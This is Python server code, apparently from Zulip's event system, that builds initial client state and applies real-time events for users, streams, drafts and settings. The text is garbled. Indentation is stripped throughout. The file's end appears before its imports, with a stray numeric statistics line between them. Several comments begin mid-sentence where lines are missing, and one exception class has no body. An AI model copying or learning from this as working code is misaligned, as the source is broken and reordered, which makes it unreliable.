if event["setting_name"] != "timezone":
assert event["setting_name"] in UserProfile.display_settings_legacy
state[event["setting_name"]] = event["setting"]
elif event["type"] == "update_global_notifications":
assert event["notification_name"] in UserProfile.notification_settings_legacy
state[event["notification_name"]] = event["setting"]
elif event["type"] == "user_settings":
# timezone setting is not included in property_types dict because
# this setting is not a part of UserBaseSettings class.
if event["property"] != "timezone":
assert event["property"] in UserProfile.property_types
if event["property"] in {
**UserProfile.display_settings_legacy,
**UserProfile.notification_settings_legacy,
}:
state[event["property"]] = event["value"]
state["user_settings"][event["property"]] = event["value"]
elif event["type"] == "invites_changed":
pass
elif event["type"] == "user_group":
if event["op"] == "add":
state["realm_user_groups"].append(event["group"])
state["realm_user_groups"].sort(key=lambda group: group["id"])
elif event["op"] == "update":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group.update(event["data"])
elif event["op"] == "add_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group["members"].extend(event["user_ids"])
user_group["members"].sort()
elif event["op"] == "remove_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
members = set(user_group["members"])
user_group["members"] = list(members - set(event["user_ids"]))
user_group["members"].sort()
elif event["op"] == "remove":
state["realm_user_groups"] = [
ug for ug in state["realm_user_groups"] if ug["id"] != event["group_id"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "user_status":
user_id_str = str(event["user_id"])
user_status = state["user_status"]
away = event.get("away")
status_text = event.get("status_text")
emoji_name = event.get("emoji_name")
emoji_code = event.get("emoji_code")
reaction_type = event.get("reaction_type")
if user_id_str not in user_status:
user_status[user_id_str] = {}
if away is not None:
if away:
user_status[user_id_str]["away"] = True
else:
user_status[user_id_str].pop("away", None)
if status_text is not None:
if status_text == "":
user_status[user_id_str].pop("status_text", None)
else:
user_status[user_id_str]["status_text"] = status_text
if emoji_name is not None:
if emoji_name == "":
user_status[user_id_str].pop("emoji_name", None)
else:
user_status[user_id_str]["emoji_name"] = emoji_name
if emoji_code is not None:
if emoji_code == "":
user_status[user_id_str].pop("emoji_code", None)
else:
user_status[user_id_str]["emoji_code"] = emoji_code
if reaction_type is not None:
if reaction_type == UserStatus.UNICODE_EMOJI and emoji_name == "":
user_status[user_id_str].pop("reaction_type", None)
else:
user_status[user_id_str]["reaction_type"] = reaction_type
if not user_status[user_id_str]:
user_status.pop(user_id_str, None)
state["user_status"] = user_status
elif event["type"] == "has_zoom_token":
state["has_zoom_token"] = event["value"]
else:
raise AssertionError("Unexpected event type {}".format(event["type"]))
def do_events_register(
user_profile: UserProfile,
user_client: Client,
apply_markdown: bool = True,
client_gravatar: bool = False,
slim_presence: bool = False,
event_types: Optional[Sequence[str]] = None,
queue_lifespan_secs: int = 0,
all_public_streams: bool = False,
include_subscribers: bool = True,
include_streams: bool = True,
client_capabilities: Dict[str, bool] = {},
narrow: Collection[Sequence[str]] = [],
fetch_event_types: Optional[Collection[str]] = None,
) -> Dict[str, Any]:
# Technically we don't need to check this here because
# build_narrow_filter will check it, but it's nicer from an error
# handling perspective to do it before contacting Tornado
check_supported_events_narrow_filter(narrow)
notification_settings_null = client_capabilities.get("notification_settings_null", False)
bulk_message_deletion = client_capabilities.get("bulk_message_deletion", False)
user_avatar_url_field_optional = client_capabilities.get(
"user_avatar_url_field_optional", False
)
stream_typing_notifications = client_capabilities.get("stream_typing_notifications", False)
user_settings_object = client_capabilities.get("user_settings_object", False)
if user_profile.realm.email_address_visibility != Realm.EMAIL_ADDRESS_VISIBILITY_EVERYONE:
# If real email addresses are not available to the user, their
# clients cannot compute gravatars, so we force-set it to false.
client_gravatar = False
if fetch_event_types is not None:
event_types_set: Optional[Set[str]] = set(fetch_event_types)
elif event_types is not None:
event_types_set = set(event_types)
else:
event_types_set = None
# Fill up the UserMessage rows if a soft-deactivated user has returned
reactivate_user_if_soft_deactivated(user_profile)
while True:
# Note that we pass event_types, not fetch_event_types here, since
# that's what controls which future events are sent.
queue_id = request_event_queue(
user_profile,
user_client,
apply_markdown,
client_gravatar,
slim_presence,
queue_lifespan_secs,
event_types,
all_public_streams,
narrow=narrow,
bulk_message_deletion=bulk_message_deletion,
stream_typing_notifications=stream_typing_notifications,
user_settings_object=user_settings_object,
)
if queue_id is None:
raise JsonableError(_("Could not allocate event queue"))
ret = fetch_initial_state_data(
user_profile,
event_types=event_types_set,
queue_id=queue_id,
client_gravatar=client_gravatar,
user_avatar_url_field_optional=user_avatar_url_field_optional,
user_settings_object=user_settings_object,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
include_streams=include_streams,
)
# Apply events that came in while we were fetching initial data
events = get_user_events(user_profile, queue_id, -1)
try:
apply_events(
user_profile,
state=ret,
events=events,
fetch_event_types=fetch_event_types,
client_gravatar=client_gravatar,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
)
except RestartEventException:
# This represents a rare race condition, where Tornado
# restarted (and sent `restart` events) while we were waiting
# for fetch_initial_state_data to return. To avoid the client
# needing to reload shortly after loading, we recursively call
# do_events_register here.
continue
else:
break
post_process_state(user_profile, ret, notification_settings_null)
if len(events) > 0:
ret["last_event_id"] = events[-1]["id"]
else:
ret["last_event_id"] = -1
return ret
def post_process_state(
user_profile: Optional[UserProfile], ret: Dict[str, Any], notification_settings_null: bool
) -> None:
"""
NOTE:
Below is an example of post-processing initial state data AFTER we
apply events. For large payloads like `unread_msgs`, it's helpful
to have an intermediate data structure that is easy to manipulate
with O(1)-type operations as we apply events.
Then, only at the end, we put it in the form that's more appropriate
for client.
"""
if "raw_unread_msgs" in ret:
ret["unread_msgs"] = aggregate_unread_data(ret["raw_unread_msgs"])
del ret["raw_unread_msgs"]
"""
See the note above; the same technique applies below.
"""
if "raw_users" in ret:
user_dicts = list(ret["raw_users"].values())
user_dicts = sorted(user_dicts, key=lambda x: x["user_id"])
ret["realm_users"] = [d for d in user_dicts if d["is_active"]]
ret["realm_non_active_users"] = [d for d in user_dicts if not d["is_active"]]
"""
Be aware that we do intentional aliasing in the below code.
We can now safely remove the `is_active` field from all the
dicts that got partitioned into the two lists above.
We remove the field because it's already implied, and sending
it to clients makes clients prone to bugs where they "trust"
the field but don't actually update in live updates. It also
wastes bandwidth.
"""
for d in user_dicts:
d.pop("is_active")
del ret["raw_users"]
if "raw_recent_private_conversations" in ret:
# Reformat recent_private_conversations to be a list of dictionaries, rather than a dict.
ret["recent_private_conversations"] = sorted(
(
dict(
**value,
)
for (recipient_id, value) in ret["raw_recent_private_conversations"].items()
),
key=lambda x: -x["max_message_id"],
)
del ret["raw_recent_private_conversations"]
if not notification_settings_null and "subscriptions" in ret:
for stream_dict in ret["subscriptions"] + ret["unsubscribed"]:
handle_stream_notifications_compatibility(
user_profile, stream_dict, notification_settings_null
)
| 45.292867 | 100 | 0.616124 |
import copy
import time
from typing import Any, Callable, Collection, Dict, Iterable, Optional, Sequence, Set
from django.conf import settings
from django.utils.translation import gettext as _
from version import API_FEATURE_LEVEL, ZULIP_MERGE_BASE, ZULIP_VERSION
from zerver.lib.actions import (
default_stream_groups_to_dicts_sorted,
do_get_streams,
gather_subscriptions_helper,
get_available_notification_sounds,
get_default_streams_for_realm,
get_owned_bot_dicts,
get_web_public_streams,
get_web_public_subs,
streams_to_dicts_sorted,
)
from zerver.lib.alert_words import user_alert_words
from zerver.lib.avatar import avatar_url
from zerver.lib.bot_config import load_bot_config_template
from zerver.lib.compatibility import is_outdated_server
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.hotspots import get_next_hotspots
from zerver.lib.integrations import EMBEDDED_BOTS, WEBHOOK_INTEGRATIONS
from zerver.lib.message import (
aggregate_unread_data,
apply_unread_message_event,
extract_unread_data_from_um_rows,
get_raw_unread_data,
get_recent_conversations_recipient_id,
get_recent_private_conversations,
get_starred_message_ids,
remove_message_id_from_unread_mgs,
)
from zerver.lib.narrow import check_supported_events_narrow_filter, read_stop_words
from zerver.lib.presence import get_presence_for_user, get_presences_for_realm
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.realm_logo import get_realm_logo_source, get_realm_logo_url
from zerver.lib.soft_deactivation import reactivate_user_if_soft_deactivated
from zerver.lib.stream_subscription import handle_stream_notifications_compatibility
from zerver.lib.timestamp import datetime_to_timestamp
from zerver.lib.topic import TOPIC_NAME
from zerver.lib.topic_mutes import get_topic_mutes
from zerver.lib.user_groups import user_groups_in_realm_serialized
from zerver.lib.user_mutes import get_user_mutes
from zerver.lib.user_status import get_user_info_dict
from zerver.lib.users import get_cross_realm_dicts, get_raw_user_data, is_administrator_role
from zerver.models import (
MAX_TOPIC_NAME_LENGTH,
Client,
CustomProfileField,
Draft,
Message,
Realm,
RealmUserDefault,
Stream,
UserMessage,
UserProfile,
UserStatus,
custom_profile_fields_for_realm,
get_default_stream_groups,
get_realm_domains,
get_realm_playgrounds,
linkifiers_for_realm,
realm_filters_for_realm,
)
from zerver.tornado.django_api import get_user_events, request_event_queue
from zproject.backends import email_auth_enabled, password_auth_enabled
class RestartEventException(Exception):
def add_realm_logo_fields(state: Dict[str, Any], realm: Realm) -> None:
state["realm_logo_url"] = get_realm_logo_url(realm, night=False)
state["realm_logo_source"] = get_realm_logo_source(realm, night=False)
state["realm_night_logo_url"] = get_realm_logo_url(realm, night=True)
state["realm_night_logo_source"] = get_realm_logo_source(realm, night=True)
state["max_logo_file_size_mib"] = settings.MAX_LOGO_FILE_SIZE_MIB
def always_want(msg_type: str) -> bool:
return True
def fetch_initial_state_data(
user_profile: Optional[UserProfile],
*,
realm: Optional[Realm] = None,
event_types: Optional[Iterable[str]] = None,
queue_id: Optional[str] = "",
client_gravatar: bool = False,
user_avatar_url_field_optional: bool = False,
user_settings_object: bool = False,
slim_presence: bool = False,
include_subscribers: bool = True,
include_streams: bool = True,
) -> Dict[str, Any]:
if realm is None:
assert user_profile is not None
realm = user_profile.realm
state: Dict[str, Any] = {"queue_id": queue_id}
if event_types is None:
want: Callable[[str], bool] = always_want
else:
want = set(event_types).__contains__
state["zulip_version"] = ZULIP_VERSION
state["zulip_feature_level"] = API_FEATURE_LEVEL
state["zulip_merge_base"] = ZULIP_MERGE_BASE
if want("alert_words"):
state["alert_words"] = [] if user_profile is None else user_alert_words(user_profile)
# so there's no need to send custom profile field data.
if want("custom_profile_fields") and user_profile is not None:
fields = custom_profile_fields_for_realm(realm.id)
state["custom_profile_fields"] = [f.as_dict() for f in fields]
state["custom_profile_field_types"] = {
item[4]: {"id": item[0], "name": str(item[1])}
for item in CustomProfileField.ALL_FIELD_TYPES
}
if want("hotspots"):
# or local storage, rather than in the database.
state["hotspots"] = [] if user_profile is None else get_next_hotspots(user_profile)
if want("message"):
# Since the introduction of `anchor="latest"` in the API,
# `max_message_id` is primarily used for generating `local_id`
# values that are higher than this. We likely can eventually
# remove this parameter from the API.
user_messages = []
if user_profile is not None:
user_messages = (
UserMessage.objects.filter(user_profile=user_profile)
.order_by("-message_id")
.values("message_id")[:1]
)
if user_messages:
state["max_message_id"] = user_messages[0]["message_id"]
else:
state["max_message_id"] = -1
if want("drafts"):
# Note: if a user ever disables syncing drafts then all of
# their old drafts stored on the server will be deleted and
# simply retained in local storage. In which case user_drafts
# would just be an empty queryset.
user_draft_objects = Draft.objects.filter(user_profile=user_profile).order_by(
"-last_edit_time"
)[: settings.MAX_DRAFTS_IN_REGISTER_RESPONSE]
user_draft_dicts = [draft.to_dict() for draft in user_draft_objects]
state["drafts"] = user_draft_dicts
if want("muted_topics"):
state["muted_topics"] = [] if user_profile is None else get_topic_mutes(user_profile)
if want("muted_users"):
state["muted_users"] = [] if user_profile is None else get_user_mutes(user_profile)
if want("presence"):
state["presences"] = (
{} if user_profile is None else get_presences_for_realm(realm, slim_presence)
)
# Send server_timestamp, to match the format of `GET /presence` requests.
state["server_timestamp"] = time.time()
if want("realm"):
# The realm bundle includes both realm properties and server
# properties, since it's rare that one would one one and not
for property_name in Realm.property_types:
state["realm_" + property_name] = getattr(realm, property_name)
# fit into that framework.
state["realm_authentication_methods"] = realm.authentication_methods_dict()
# We pretend these features are disabled because anonymous
# users can't access them. In the future, we may want to move
state["realm_allow_message_editing"] = (
False if user_profile is None else realm.allow_message_editing
)
state["realm_edit_topic_policy"] = (
Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.edit_topic_policy
)
state["realm_delete_own_message_policy"] = (
Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.delete_own_message_policy
)
state["realm_message_content_edit_limit_seconds"] = realm.message_content_edit_limit_seconds
state[
"realm_message_content_delete_limit_seconds"
] = realm.message_content_delete_limit_seconds
state[
"realm_community_topic_editing_limit_seconds"
] = Realm.DEFAULT_COMMUNITY_TOPIC_EDITING_LIMIT_SECONDS
state["realm_presence_disabled"] = True if user_profile is None else realm.presence_disabled
state["max_avatar_file_size_mib"] = settings.MAX_AVATAR_FILE_SIZE_MIB
state["max_file_upload_size_mib"] = settings.MAX_FILE_UPLOAD_SIZE
state["max_icon_file_size_mib"] = settings.MAX_ICON_FILE_SIZE_MIB
state["realm_upload_quota_mib"] = realm.upload_quota_bytes()
state["realm_icon_url"] = realm_icon_url(realm)
state["realm_icon_source"] = realm.icon_source
add_realm_logo_fields(state, realm)
state["realm_uri"] = realm.uri
state["realm_bot_domain"] = realm.get_bot_domain()
state["realm_available_video_chat_providers"] = realm.VIDEO_CHAT_PROVIDERS
state["settings_send_digest_emails"] = settings.SEND_DIGEST_EMAILS
state["realm_digest_emails_enabled"] = (
realm.digest_emails_enabled and settings.SEND_DIGEST_EMAILS
)
state["realm_email_auth_enabled"] = email_auth_enabled(realm)
state["realm_password_auth_enabled"] = password_auth_enabled(realm)
state["server_generation"] = settings.SERVER_GENERATION
state["realm_is_zephyr_mirror_realm"] = realm.is_zephyr_mirror_realm
state["development_environment"] = settings.DEVELOPMENT
state["realm_plan_type"] = realm.plan_type
state["zulip_plan_is_not_limited"] = realm.plan_type != Realm.PLAN_TYPE_LIMITED
state["upgrade_text_for_wide_organization_logo"] = str(Realm.UPGRADE_TEXT_STANDARD)
state["password_min_length"] = settings.PASSWORD_MIN_LENGTH
state["password_min_guesses"] = settings.PASSWORD_MIN_GUESSES
state["server_inline_image_preview"] = settings.INLINE_IMAGE_PREVIEW
state["server_inline_url_embed_preview"] = settings.INLINE_URL_EMBED_PREVIEW
state["server_avatar_changes_disabled"] = settings.AVATAR_CHANGES_DISABLED
state["server_name_changes_disabled"] = settings.NAME_CHANGES_DISABLED
state["server_web_public_streams_enabled"] = settings.WEB_PUBLIC_STREAMS_ENABLED
state["giphy_rating_options"] = realm.GIPHY_RATING_OPTIONS
state["server_needs_upgrade"] = is_outdated_server(user_profile)
state[
"event_queue_longpoll_timeout_seconds"
] = settings.EVENT_QUEUE_LONGPOLL_TIMEOUT_SECONDS
state["realm_push_notifications_enabled"] = push_notifications_enabled()
state["realm_default_external_accounts"] = DEFAULT_EXTERNAL_ACCOUNTS
if settings.JITSI_SERVER_URL is not None:
state["jitsi_server_url"] = settings.JITSI_SERVER_URL.rstrip("/")
else:
state["jitsi_server_url"] = None
if realm.notifications_stream and not realm.notifications_stream.deactivated:
notifications_stream = realm.notifications_stream
state["realm_notifications_stream_id"] = notifications_stream.id
else:
state["realm_notifications_stream_id"] = -1
signup_notifications_stream = realm.get_signup_notifications_stream()
if signup_notifications_stream:
state["realm_signup_notifications_stream_id"] = signup_notifications_stream.id
else:
state["realm_signup_notifications_stream_id"] = -1
state["max_stream_name_length"] = Stream.MAX_NAME_LENGTH
state["max_stream_description_length"] = Stream.MAX_DESCRIPTION_LENGTH
state["max_topic_length"] = MAX_TOPIC_NAME_LENGTH
state["max_message_length"] = settings.MAX_MESSAGE_LENGTH
if realm.demo_organization_scheduled_deletion_date is not None:
state["demo_organization_scheduled_deletion_date"] = datetime_to_timestamp(
realm.demo_organization_scheduled_deletion_date
)
if want("realm_user_settings_defaults"):
realm_user_default = RealmUserDefault.objects.get(realm=realm)
state["realm_user_settings_defaults"] = {}
for property_name in RealmUserDefault.property_types:
state["realm_user_settings_defaults"][property_name] = getattr(
realm_user_default, property_name
)
state["realm_user_settings_defaults"][
"emojiset_choices"
] = RealmUserDefault.emojiset_choices()
state["realm_user_settings_defaults"][
"available_notification_sounds"
] = get_available_notification_sounds()
if want("realm_domains"):
state["realm_domains"] = get_realm_domains(realm)
if want("realm_emoji"):
state["realm_emoji"] = realm.get_emoji()
if want("realm_linkifiers"):
state["realm_linkifiers"] = linkifiers_for_realm(realm.id)
if want("realm_filters"):
state["realm_filters"] = realm_filters_for_realm(realm.id)
if want("realm_playgrounds"):
state["realm_playgrounds"] = get_realm_playgrounds(realm)
if want("realm_user_groups"):
state["realm_user_groups"] = user_groups_in_realm_serialized(realm)
if user_profile is not None:
settings_user = user_profile
else:
settings_user = UserProfile(
full_name="Anonymous User",
email="username@example.com",
delivery_email="username@example.com",
realm=realm,
role=UserProfile.ROLE_GUEST,
is_billing_admin=False,
avatar_source=UserProfile.AVATAR_FROM_GRAVATAR,
id=0,
)
if want("realm_user"):
state["raw_users"] = get_raw_user_data(
realm,
user_profile,
client_gravatar=client_gravatar,
user_avatar_url_field_optional=user_avatar_url_field_optional,
include_custom_profile_fields=user_profile is not None,
)
state["cross_realm_bots"] = list(get_cross_realm_dicts())
# For the user's own avatar URL, we force
state["avatar_source"] = settings_user.avatar_source
state["avatar_url_medium"] = avatar_url(
settings_user,
medium=True,
client_gravatar=False,
)
state["avatar_url"] = avatar_url(
settings_user,
medium=False,
client_gravatar=False,
)
state["can_create_private_streams"] = settings_user.can_create_private_streams()
state["can_create_public_streams"] = settings_user.can_create_public_streams()
state["can_create_streams"] = (
settings_user.can_create_private_streams()
or settings_user.can_create_public_streams()
or settings_user.can_create_web_public_streams()
)
state["can_create_web_public_streams"] = settings_user.can_create_web_public_streams()
state["can_subscribe_other_users"] = settings_user.can_subscribe_other_users()
state["can_invite_others_to_realm"] = settings_user.can_invite_others_to_realm()
state["is_admin"] = settings_user.is_realm_admin
state["is_owner"] = settings_user.is_realm_owner
state["is_moderator"] = settings_user.is_moderator
state["is_guest"] = settings_user.is_guest
state["is_billing_admin"] = settings_user.is_billing_admin
state["user_id"] = settings_user.id
state["email"] = settings_user.email
state["delivery_email"] = settings_user.delivery_email
state["full_name"] = settings_user.full_name
if want("realm_bot"):
state["realm_bots"] = [] if user_profile is None else get_owned_bot_dicts(user_profile)
if want("realm_embedded_bots"):
realm_embedded_bots = []
for bot in EMBEDDED_BOTS:
realm_embedded_bots.append(
{"name": bot.name, "config": load_bot_config_template(bot.name)}
)
state["realm_embedded_bots"] = realm_embedded_bots
if want("realm_incoming_webhook_bots"):
realm_incoming_webhook_bots = []
for integration in WEBHOOK_INTEGRATIONS:
realm_incoming_webhook_bots.append(
{
"name": integration.name,
"config": {c[1]: c[0] for c in integration.config_options},
}
)
state["realm_incoming_webhook_bots"] = realm_incoming_webhook_bots
if want("recent_private_conversations"):
state["raw_recent_private_conversations"] = (
{} if user_profile is None else get_recent_private_conversations(user_profile)
)
if want("subscription"):
if user_profile is not None:
sub_info = gather_subscriptions_helper(
user_profile,
include_subscribers=include_subscribers,
)
else:
sub_info = get_web_public_subs(realm)
state["subscriptions"] = sub_info.subscriptions
state["unsubscribed"] = sub_info.unsubscribed
state["never_subscribed"] = sub_info.never_subscribed
if want("update_message_flags") and want("message"):
if user_profile is not None:
state["raw_unread_msgs"] = get_raw_unread_data(user_profile)
else:
state["raw_unread_msgs"] = extract_unread_data_from_um_rows([], user_profile)
if want("starred_messages"):
state["starred_messages"] = (
[] if user_profile is None else get_starred_message_ids(user_profile)
)
if want("stream"):
if include_streams:
# it uses data from state["subscriptions"] and other
# places.
if user_profile is not None:
state["streams"] = do_get_streams(
user_profile, include_all_active=user_profile.is_realm_admin
)
else:
# TODO: This line isn't used by the web app because it
state["streams"] = get_web_public_streams(realm)
if want("default_streams"):
if settings_user.is_guest:
# all default streams, so we pretend the organization
# doesn't have any.
state["realm_default_streams"] = []
else:
state["realm_default_streams"] = streams_to_dicts_sorted(
get_default_streams_for_realm(realm.id)
)
if want("default_stream_groups"):
if settings_user.is_guest:
state["realm_default_stream_groups"] = []
else:
state["realm_default_stream_groups"] = default_stream_groups_to_dicts_sorted(
get_default_stream_groups(realm)
)
if want("stop_words"):
state["stop_words"] = read_stop_words()
if want("update_display_settings") and not user_settings_object:
for prop in UserProfile.display_settings_legacy:
state[prop] = getattr(settings_user, prop)
state["emojiset_choices"] = UserProfile.emojiset_choices()
state["timezone"] = settings_user.timezone
if want("update_global_notifications") and not user_settings_object:
for notification in UserProfile.notification_settings_legacy:
state[notification] = getattr(settings_user, notification)
state["available_notification_sounds"] = get_available_notification_sounds()
if want("user_settings"):
state["user_settings"] = {}
for prop in UserProfile.property_types:
state["user_settings"][prop] = getattr(settings_user, prop)
state["user_settings"]["emojiset_choices"] = UserProfile.emojiset_choices()
state["user_settings"]["timezone"] = settings_user.timezone
state["user_settings"][
"available_notification_sounds"
] = get_available_notification_sounds()
if want("user_status"):
state["user_status"] = {} if user_profile is None else get_user_info_dict(realm_id=realm.id)
if want("video_calls"):
state["has_zoom_token"] = settings_user.zoom_token is not None
if want("giphy"):
# require the API key to work). This security model makes
# sense because GIPHY API keys are all essentially equivalent
# in letting one search for GIFs; GIPHY only requires API keys
# to exist at all so that they can deactivate them in cases of
# abuse.
state["giphy_api_key"] = settings.GIPHY_API_KEY if settings.GIPHY_API_KEY else ""
if user_profile is None:
# To ensure we have the correct user state set.
assert state["is_admin"] is False
assert state["is_owner"] is False
assert state["is_guest"] is True
return state
def apply_events(
user_profile: UserProfile,
*,
state: Dict[str, Any],
events: Iterable[Dict[str, Any]],
fetch_event_types: Optional[Collection[str]],
client_gravatar: bool,
slim_presence: bool,
include_subscribers: bool,
) -> None:
for event in events:
if event["type"] == "restart":
raise RestartEventException()
if fetch_event_types is not None and event["type"] not in fetch_event_types:
# TODO: continuing here is not, most precisely, correct.
# In theory, an event of one type, e.g. `realm_user`,
# could modify state that doesn't come from that
continue
apply_event(
user_profile,
state=state,
event=event,
client_gravatar=client_gravatar,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
)
def apply_event(
user_profile: UserProfile,
*,
state: Dict[str, Any],
event: Dict[str, Any],
client_gravatar: bool,
slim_presence: bool,
include_subscribers: bool,
) -> None:
if event["type"] == "message":
state["max_message_id"] = max(state["max_message_id"], event["message"]["id"])
if "raw_unread_msgs" in state:
apply_unread_message_event(
user_profile,
state["raw_unread_msgs"],
event["message"],
event["flags"],
)
if event["message"]["type"] != "stream":
if "raw_recent_private_conversations" in state:
conversations = state["raw_recent_private_conversations"]
recipient_id = get_recent_conversations_recipient_id(
user_profile, event["message"]["recipient_id"], event["message"]["sender_id"]
)
if recipient_id not in conversations:
conversations[recipient_id] = dict(
user_ids=sorted(
user_dict["id"]
for user_dict in event["message"]["display_recipient"]
if user_dict["id"] != user_profile.id
),
)
conversations[recipient_id]["max_message_id"] = event["message"]["id"]
return
for sub_dict in state.get("subscriptions", []):
if event["message"]["stream_id"] == sub_dict["stream_id"]:
if sub_dict["first_message_id"] is None:
sub_dict["first_message_id"] = event["message"]["id"]
for stream_dict in state.get("streams", []):
if event["message"]["stream_id"] == stream_dict["stream_id"]:
if stream_dict["first_message_id"] is None:
stream_dict["first_message_id"] = event["message"]["id"]
elif event["type"] == "heartbeat":
pass
elif event["type"] == "drafts":
if event["op"] == "add":
state["drafts"].extend(event["drafts"])
else:
if event["op"] == "update":
event_draft_idx = event["draft"]["id"]
def _draft_update_action(i: int) -> None:
state["drafts"][i] = event["draft"]
elif event["op"] == "remove":
event_draft_idx = event["draft_id"]
def _draft_update_action(i: int) -> None:
del state["drafts"][i]
# We have to perform a linear search for the draft that
# was either edited or removed since we have a list
# ordered by the last edited timestamp and not id.
state_draft_idx = None
for idx, draft in enumerate(state["drafts"]):
if draft["id"] == event_draft_idx:
state_draft_idx = idx
break
assert state_draft_idx is not None
_draft_update_action(state_draft_idx)
elif event["type"] == "hotspots":
state["hotspots"] = event["hotspots"]
elif event["type"] == "custom_profile_fields":
state["custom_profile_fields"] = event["fields"]
custom_profile_field_ids = {field["id"] for field in state["custom_profile_fields"]}
if "raw_users" in state:
for user_dict in state["raw_users"].values():
if "profile_data" not in user_dict:
continue
profile_data = user_dict["profile_data"]
for (field_id, field_data) in list(profile_data.items()):
if int(field_id) not in custom_profile_field_ids:
del profile_data[field_id]
elif event["type"] == "realm_user":
person = event["person"]
person_user_id = person["user_id"]
if event["op"] == "add":
person = copy.deepcopy(person)
if client_gravatar:
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["is_active"] = True
if not person["is_bot"]:
person["profile_data"] = {}
state["raw_users"][person_user_id] = person
elif event["op"] == "remove":
state["raw_users"][person_user_id]["is_active"] = False
elif event["op"] == "update":
is_me = person_user_id == user_profile.id
if is_me:
if "avatar_url" in person and "avatar_url" in state:
state["avatar_source"] = person["avatar_source"]
state["avatar_url"] = person["avatar_url"]
state["avatar_url_medium"] = person["avatar_url_medium"]
if "role" in person:
state["is_admin"] = is_administrator_role(person["role"])
state["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
state["is_moderator"] = person["role"] == UserProfile.ROLE_MODERATOR
state["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
# Recompute properties based on is_admin/is_guest
state["can_create_private_streams"] = user_profile.can_create_private_streams()
state["can_create_public_streams"] = user_profile.can_create_public_streams()
state[
"can_create_web_public_streams"
] = user_profile.can_create_web_public_streams()
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
state["can_subscribe_other_users"] = user_profile.can_subscribe_other_users()
state["can_invite_others_to_realm"] = user_profile.can_invite_others_to_realm()
# TODO: Probably rather than writing the perfect
# live-update code for the case of racing with the
# current user changing roles, we should just do a
# full refetch.
if "never_subscribed" in state:
sub_info = gather_subscriptions_helper(
user_profile,
include_subscribers=include_subscribers,
)
state["subscriptions"] = sub_info.subscriptions
state["unsubscribed"] = sub_info.unsubscribed
state["never_subscribed"] = sub_info.never_subscribed
if "streams" in state:
state["streams"] = do_get_streams(
user_profile, include_all_active=user_profile.is_realm_admin
)
if state["is_guest"]:
state["realm_default_streams"] = []
else:
state["realm_default_streams"] = streams_to_dicts_sorted(
get_default_streams_for_realm(user_profile.realm_id)
)
for field in ["delivery_email", "email", "full_name", "is_billing_admin"]:
if field in person and field in state:
state[field] = person[field]
if "new_email" in person:
state["email"] = person["new_email"]
# In the unlikely event that the current user
# just changed to/from being an admin, we need
# to add/remove the data on all bots in the
# realm. This is ugly and probably better
# solved by removing the all-realm-bots data
# given to admin users from this flow.
if "role" in person and "realm_bots" in state:
prev_state = state["raw_users"][user_profile.id]
was_admin = prev_state["is_admin"]
now_admin = is_administrator_role(person["role"])
if was_admin and not now_admin:
state["realm_bots"] = []
if not was_admin and now_admin:
state["realm_bots"] = get_owned_bot_dicts(user_profile)
if client_gravatar and "avatar_url" in person:
# Respect the client_gravatar setting in the `users` data.
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["avatar_url_medium"] = None
if person_user_id in state["raw_users"]:
p = state["raw_users"][person_user_id]
for field in p:
if field in person:
p[field] = person[field]
if "role" in person:
p["is_admin"] = is_administrator_role(person["role"])
p["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
p["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
if "is_billing_admin" in person:
p["is_billing_admin"] = person["is_billing_admin"]
if "custom_profile_field" in person:
custom_field_id = person["custom_profile_field"]["id"]
custom_field_new_value = person["custom_profile_field"]["value"]
if "rendered_value" in person["custom_profile_field"]:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
"rendered_value": person["custom_profile_field"]["rendered_value"],
}
else:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
}
if "new_email" in person:
p["email"] = person["new_email"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_bot":
if event["op"] == "add":
state["realm_bots"].append(event["bot"])
elif event["op"] == "remove":
user_id = event["bot"]["user_id"]
for bot in state["realm_bots"]:
if bot["user_id"] == user_id:
bot["is_active"] = False
elif event["op"] == "delete":
state["realm_bots"] = [
item for item in state["realm_bots"] if item["user_id"] != event["bot"]["user_id"]
]
elif event["op"] == "update":
for bot in state["realm_bots"]:
if bot["user_id"] == event["bot"]["user_id"]:
if "owner_id" in event["bot"]:
bot_owner_id = event["bot"]["owner_id"]
bot["owner_id"] = bot_owner_id
else:
bot.update(event["bot"])
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "stream":
if event["op"] == "create":
for stream in event["streams"]:
if not stream["invite_only"]:
stream_data = copy.deepcopy(stream)
if include_subscribers:
stream_data["subscribers"] = []
# We know the stream has no traffic, and this
# field is not present in the event.
#
# TODO: Probably this should just be added to the event.
stream_data["stream_weekly_traffic"] = None
# Add stream to never_subscribed (if not invite_only)
state["never_subscribed"].append(stream_data)
if "streams" in state:
state["streams"].append(stream)
if "streams" in state:
state["streams"].sort(key=lambda elt: elt["name"])
if event["op"] == "delete":
deleted_stream_ids = {stream["stream_id"] for stream in event["streams"]}
if "streams" in state:
state["streams"] = [
s for s in state["streams"] if s["stream_id"] not in deleted_stream_ids
]
state["never_subscribed"] = [
stream
for stream in state["never_subscribed"]
if stream["stream_id"] not in deleted_stream_ids
]
if event["op"] == "update":
# For legacy reasons, we call stream data 'subscriptions' in
# the state var here, for the benefit of the JS code.
